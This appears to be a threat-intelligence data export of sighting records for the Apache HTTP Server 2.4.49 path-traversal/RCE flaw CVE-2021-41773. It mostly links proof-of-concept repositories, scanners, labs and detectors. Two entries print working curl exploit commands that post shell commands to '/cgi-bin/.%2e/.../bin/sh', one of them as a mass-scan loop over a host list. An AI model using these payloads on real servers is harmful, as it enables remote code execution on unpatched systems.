{"uuid": "b6ccfa77-60ae-4369-bb61-a4af8fe27f39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/650", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aExploitation of CVE-2021-41773 a Directory Traversal in Apache 2.4.49.\nURL\uff1ahttps://github.com/RyouYoo/CVE-2021-41773", "creation_timestamp": "2021-10-05T20:33:43.000000Z"}, {"uuid": "eac868cc-d654-4d1c-882d-08381456d005", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/649", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPath traversal in Apache HTTP Server 2.4.49 (CVE-2021-41773) \nURL\uff1ahttps://github.com/knqyf263/CVE-2021-41773", "creation_timestamp": "2021-10-05T16:55:20.000000Z"}, {"uuid": "66eac895-338e-41ee-b42d-eaa891ab3d34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/656", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-41773.nse\nURL\uff1ahttps://github.com/TishcaTpx/cve-2021-41773-nse", "creation_timestamp": "2021-10-06T05:35:54.000000Z"}, {"uuid": "bf9d6488-ae1a-4ebb-8e88-865957c3c494", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/648", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-41773\nURL\uff1ahttps://github.com/numanturle/CVE-2021-41773", "creation_timestamp": "2021-10-05T16:21:03.000000Z"}, {"uuid": "ca5193a2-2abc-4b97-a06c-76899ed5f49b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/647", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-41773 Path Traversal vulnerability in Apache 2.4.49.\nURL\uff1ahttps://github.com/Vulnmachines/cve-2021-41773", "creation_timestamp": "2021-10-05T16:16:44.000000Z"}, {"uuid": "18996510-79ed-4346-983f-90d9c987b873", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/655", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-41773.nse\nURL\uff1ahttps://github.com/creadpag/CVE-2021-41773", "creation_timestamp": "2021-10-06T05:27:23.000000Z"}, {"uuid": "9de214bb-e655-408c-95c9-155ad6406f75", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/678", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aSimple script realizado en bash, para revisi\u00f3n de m\u00faltiples hosts para CVE-2021-41773 (Apache)\nURL\uff1ahttps://github.com/jheeree/Simple-CVE-2021-41773-checker", "creation_timestamp": "2021-10-12T03:01:17.000000Z"}, {"uuid": "0fca118c-24ac-4a35-b71e-3de9c93994bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/805", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aSome docker images to play with CVE-2021-41773 and CVE-2021-42013\nURL\uff1ahttps://github.com/Hydragyrum/CVE-2021-41773-Playground", "creation_timestamp": "2021-11-04T22:56:15.000000Z"}, {"uuid": "381de5a3-2108-4a09-bd38-95998e861b93", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/663", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-41773 \u7684\u590d\u73b0\nURL\uff1ahttps://github.com/1nhann/CVE-2021-41773", "creation_timestamp": "2021-10-06T14:19:15.000000Z"}, {"uuid": "6bcf7976-f0f0-4186-a710-734d72e71d90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/668", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aexploit to CVE-2021-41773\nURL\uff1ahttps://github.com/n3k00n3/CVE-2021-41773", "creation_timestamp": "2021-10-07T15:19:54.000000Z"}, {"uuid": "5ebb314b-9b62-47d9-b114-ca0adaf19229", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/712", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aLab setup for CVE-2021-41773 (Apache httpd 2.4.49) and CVE-2021-42013 (Apache httpd 2.4.50).\nURL\uff1ahttps://github.com/vulf/CVE-2021-41773_42013", "creation_timestamp": "2021-10-18T12:53:10.000000Z"}, {"uuid": "99e43c52-52a1-4059-b4b4-1a4af2664a6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/737", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA Zeek package which raises notices for Path Traversal/RCE in Apache HTTP Server 2.4.49 (CVE-2021-41773) and 2.4.50 (CVE-2021-42013)\nURL\uff1ahttps://github.com/corelight/CVE-2021-41773", "creation_timestamp": "2021-10-25T05:17:17.000000Z"}, {"uuid": "22ab1b25-9b7a-4df8-8b39-d656b4a7985d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/886", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-41773 Test Page &amp; Exploit Code\nURL\uff1ahttps://github.com/jhye0n/CVE-2021-41773", "creation_timestamp": "2021-11-26T04:59:31.000000Z"}, {"uuid": "d6ad9e6d-93de-46ed-829f-c77c84edcdef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/833", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aProof-of-Concept for CVE-2021-41773\nURL\uff1ahttps://github.com/ahmad4fifz/docker-cve-2021-41773", "creation_timestamp": "2021-11-09T05:26:11.000000Z"}, {"uuid": "21269262-fc3a-4cca-84c3-47d3cba83527", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "exploited", "source": "https://t.me/cKure/7543", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 Apache Software Foundation has released HTTP Web Server 2.4.51 to address an actively exploited path traversal vulnerability (CVE-2021-41773) that was only partially addressed with a previous release.\n\nhttps://httpd.apache.org/security/vulnerabilities_24.html", "creation_timestamp": "2021-10-08T15:06:01.000000Z"}, {"uuid": "9306a6f8-5636-4b3e-875e-1984757146cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3mizizvmm3i2t", "content": "", "creation_timestamp": "2026-04-09T00:03:42.070890Z"}, {"uuid": "9b290c7f-1560-478d-a572-b3541e627c39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/cKure/7479", "content": "\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPath traversal in Apache HTTP Server 2.4.49 (CVE-2021-41773) \nURL. Zero-Day \n\nhttps://github.com/knqyf263/CVE-2021-41773", "creation_timestamp": "2021-10-06T05:39:43.000000Z"}, {"uuid": "286c5e5d-56ce-479f-ad78-c37582bcecb6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/cKure/7472", "content": "\u25a0\u25a0\u25a0\u25a0\u25a0 Zero-Day exploit code:\n\nhttps://github.com/numanturle/CVE-2021-41773", "creation_timestamp": "2021-10-05T17:00:52.000000Z"}, {"uuid": "22cee02e-da52-47fa-9f69-a423cd4d7116", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/cKure/7471", "content": "\u25a0\u25a0\u25a0\u25a0\u25a0 Zero-Day exploit code:\n\nhttps://github.com/Vulnmachines/cve-2021-41773", "creation_timestamp": "2021-10-05T17:00:51.000000Z"}, {"uuid": "489c4199-2a76-4178-9c2c-88fefdc9c2e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/cKure/7469", "content": "\u25a0\u25a0\u25a1\u25a1\u25a1 PoC (not included) for path traversal in Apache HTTP Server 2.4.49 (CVE-2021-41773)\n\nhttps://twitter.com/ducnt_/status/1445386557574324234", "creation_timestamp": "2021-10-05T14:37:33.000000Z"}, {"uuid": "04540ca9-dc62-4bee-bf3c-94a032d8e3f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/cKure/7504", "content": "\u25a0\u25a0\u25a0\u25a0\u25a0 Update : CVE-2021-41773 POC as RCE.\n\ncat file | while read host do ; do curl --silent --path-as-is --data \"echo;id\" '$host/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' | grep \"uid\" &amp;&amp; echo \"$host \\033[0;31mVuln\\n\"|| echo \"$host \\033[0;32mNot\\n\";done\n\nSource: Rohit", "creation_timestamp": "2021-10-06T21:35:44.000000Z"}, {"uuid": "124f2b07-630a-4f08-842f-fa4fbd4684c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/cKure/7503", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 Update: CVE-2021-41773 POC as RCE via BurpSuite.\n\nSource: Rapid-SafeGuard", "creation_timestamp": "2021-10-06T21:35:36.000000Z"}, {"uuid": "8625e7aa-9f51-4f21-a537-fbc88b254518", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/cKure/7480", "content": "\u25a0\u25a0\u25a0\u25a0\u25a0 CVE-2021-41773.nse by Dhiraj (\ud83c\uddee\ud83c\uddf3/\ud83c\udde6\ud83c\uddea)\n\nhttps://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse", "creation_timestamp": "2021-10-06T05:47:45.000000Z"}, {"uuid": "f49a6a89-c46e-4511-ae24-1ebf4a4873de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/cKure/7562", "content": "\u25a0\u25a0\u25a0\u25a0\u25a0 Zero-Day: add. apache 2.4.49 CVE-2021-41773 - RCE\n\nApache 2.4.49 CVE-2021-41773 and Apache 2.4.50 CVE-2021-42013 - SCANNER/TRAVERSAL/RCE.\n\nhttps://github.com/rapid7/metasploit-framework/pull/15754", "creation_timestamp": "2021-10-09T20:13:58.000000Z"}, {"uuid": "b4db485f-3727-4660-baad-8bec1efc90a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "exploited", "source": "https://t.me/cKure/7721", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 Apache HTTP Server CVE-2021-42013 and CVE-2021-41773 Exploited in the Wild.\n\nhttps://blogs.juniper.net/en-us/enterprise-cloud-and-transformation/apache-http-server-cve-2021-42013-and-cve-2021-41773-exploited", "creation_timestamp": "2021-10-22T10:18:06.000000Z"}, {"uuid": "ff8b3edc-1976-4f35-bc2f-bc3c0b35d72b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/cKure/7578", "content": "\u25a0\u25a0\u25a0\u25a1\u25a1 Apache (Linux) CVE-2021-41773/2021-42013 Mass Vulnerability Checker\n\nAutomatic Mass Tool for checking vulnerability in Apache (Linux) 2.4.49/50\nUsing GNU Parallel. You must have parallel for running this tool\n\nhttps://github.com/im-hanzou/apachrot", "creation_timestamp": "2021-10-12T08:10:40.000000Z"}, {"uuid": "29982bfc-11a8-495c-9eb3-16ab059f9c79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/cKure/7826", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 Scarce-Apache2 - A Framework For Bug Hunting Or Pentesting Targeting Websites That Have CVE-2021-41773 Vulnerability In Public.\n\nhttps://github.com/HightechSec/scarce-apache2", "creation_timestamp": "2021-10-29T21:07:05.000000Z"}, {"uuid": "e3ba8b01-9403-4c83-a20c-502864c8c8a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/apache_http_server_cve_2021_41773", "content": "", "creation_timestamp": "2021-10-05T15:39:32.000000Z"}, {"uuid": "41cf7e3a-8662-414f-804f-50a6a5788bfb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/1402", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPseudopatch for CVE-2021-4034\nURL\uff1ahttps://github.com/m96dg/CVE-2021-41773-exercise", "creation_timestamp": "2022-01-26T11:26:48.000000Z"}, {"uuid": "da0a3d57-85fe-4e6a-a4bc-75c123acf166", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/8XN8wAMSKexF4HKj61t8L1D_BdecH-IzCKOqVJJvRwF7CEY", "content": "", "creation_timestamp": "2025-08-31T21:00:04.000000Z"}, {"uuid": "73bf9f87-b625-4c0d-b57e-4dd8b7cdad0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4397", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1a\u6f0f\u6d1e\u5229\u7528\n\u63cf\u8ff0\uff1aCVE-2021-41773&amp;CVE-2021-42013\u56fe\u5f62\u5316\u6f0f\u6d1e\u68c0\u6d4b\u5229\u7528\u5de5\u5177\nURL\uff1ahttps://github.com/wangfly-me/Apache_Penetration_Tool\n\n\u6807\u7b7e\uff1a#\u6f0f\u6d1e\u5229\u7528", "creation_timestamp": "2023-05-22T16:07:10.000000Z"}, {"uuid": "7bf2acd4-28ae-441f-bb22-40d96dc7910e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/0biwTUuLeP8fV3CLIKNGVSiiFWt5ZFMF_6OnpLfPRJ6mS18", "content": "", "creation_timestamp": "2025-07-03T03:00:06.000000Z"}, {"uuid": "a1c4afd0-bbdd-4b7f-b1e0-7ab2d01461e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "Telegram/4epyOE2WMrg9wtf44lKwHTXzsLVHmzcmItx48ClyVbvn93Q", "content": "", "creation_timestamp": "2025-11-19T21:00:05.000000Z"}, {"uuid": "1da51df5-d3a8-4c58-927b-59170a16f76f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "exploited", "source": "Telegram/p9aXpoU_FZfvPwaFGC2z6wToIKsj9JEw53i6nfBS-Wl44_8", "content": "", "creation_timestamp": "2025-10-28T21:00:05.000000Z"}, {"uuid": "9abc3638-3615-4fef-8988-04ea2072c61f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/x_notes/366", "content": "\u041d\u0435\u0434\u0430\u0432\u043d\u044f\u044f CVE-2021-41773 \u0432 Apache 2.4.49, \u044d\u0442\u043e \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0432\u044b\u0445\u043e\u0434 \u0438\u0437 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438 \u0441 \u0447\u0442\u0435\u043d\u0438\u0435\u043c \u0444\u0430\u0439\u043b\u043e\u0432, \u043a\u0430\u043a \u043c\u043d\u043e\u0433\u0438\u0435 \u043f\u043e\u0434\u0443\u043c\u0430\u043b\u0438 \n\ncurl --data \"A=|echo;id\" 'http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'", "creation_timestamp": "2021-10-06T07:33:35.000000Z"}, {"uuid": "0d8def6c-cce6-4c19-81b9-970ecf292a72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/qjOaAZzY7N8k20cR3teIz-OZWmlhb63IqcEwlIa5eVjooMw", "content": "", "creation_timestamp": "2025-10-07T15:00:06.000000Z"}, {"uuid": "d5d42d40-8d4b-468a-9f9c-6a8ba4e7dd01", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/CGx8SegN-49RVeuavtq3Jo8Ts2xr-V3iQ0C2UE4RT_zZzg8", "content": "", "creation_timestamp": "2026-01-12T15:00:08.000000Z"}, {"uuid": "1d128111-b9f2-435b-9a2b-9375b4654bc6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/Z6KDFyAddhR_WTTdj8KLR9BqWCW4LVkYFOJnFavxpUnMZmU", "content": "", "creation_timestamp": "2026-01-08T03:00:07.000000Z"}, {"uuid": "c94b4585-271b-4d17-a7d2-876730e8d47b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/pmzKbihchBYeJvBnkfYLk5LESIxSAVi0zGHv3QahmixU_js", "content": "", "creation_timestamp": "2026-04-20T09:00:05.000000Z"}, {"uuid": "fc8e8ed7-4ce4-45c2-9c71-894f90952ba2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/BJFlaDl_9BJZma2LgARVypNYw9rydPG4dhbOcWVAV8nGsFg", "content": "", "creation_timestamp": "2026-04-23T09:00:04.000000Z"}, {"uuid": "0e972958-6398-4213-b205-cf6edeff5618", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/667", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aMASS CVE-2021-41773\nURL\uff1ahttps://github.com/justakazh/mass_cve-2021-41773", "creation_timestamp": "2021-10-07T15:15:37.000000Z"}, {"uuid": "f542580a-9466-4418-8d94-d5175c8b9998", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/716", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-41773 Docker lab\nURL\uff1ahttps://github.com/cloudbyteelias/CVE-2021-41773", "creation_timestamp": "2021-10-20T01:36:15.000000Z"}, {"uuid": "7003b0d6-a0f8-4f69-ac71-6b699bf2a0a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/742", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-41773 is a python script that will help in finding Path Traversal or Remote Code Execution vulnerability in Apache 2.4.49\nURL\uff1ahttps://github.com/walnutsecurity/cve-2021-41773", "creation_timestamp": "2021-10-25T17:33:06.000000Z"}, {"uuid": "5995f068-c2ea-4db2-8a5a-60a80501c0f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/659", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-41773 playground\nURL\uff1ahttps://github.com/blasty/CVE-2021-41773", "creation_timestamp": "2021-10-06T07:22:18.000000Z"}, {"uuid": "421b2bb3-1136-4472-b537-eec3daafda4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/658", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aPoC CVE-2021-41773\nURL\uff1ahttps://github.com/trungnd51/CVE-2021-41773", "creation_timestamp": "2021-10-06T06:39:45.000000Z"}, {"uuid": "95819eb1-3594-42f8-bbb7-d12ca6302185", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/657", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-41773\nURL\uff1ahttps://github.com/creadpag/CVE-2021-41773-POC", "creation_timestamp": "2021-10-06T05:40:10.000000Z"}, {"uuid": "ff9871f1-3eab-4985-802e-e5ee0aa0169f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/666", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA framework for bug hunting or pentesting targeting websites that have CVE-2021-41773 Vulnerability in public \nURL\uff1ahttps://github.com/HightechSec/scarce-apache2", "creation_timestamp": "2021-10-07T02:33:57.000000Z"}, {"uuid": "0a30cdc6-304b-4509-a52e-11a23dc93782", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/879", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aCVE-2021-41773 on Docker\nURL\uff1ahttps://github.com/ahmad4fifz/CVE-2021-42013", "creation_timestamp": "2021-11-25T09:55:12.000000Z"}, {"uuid": 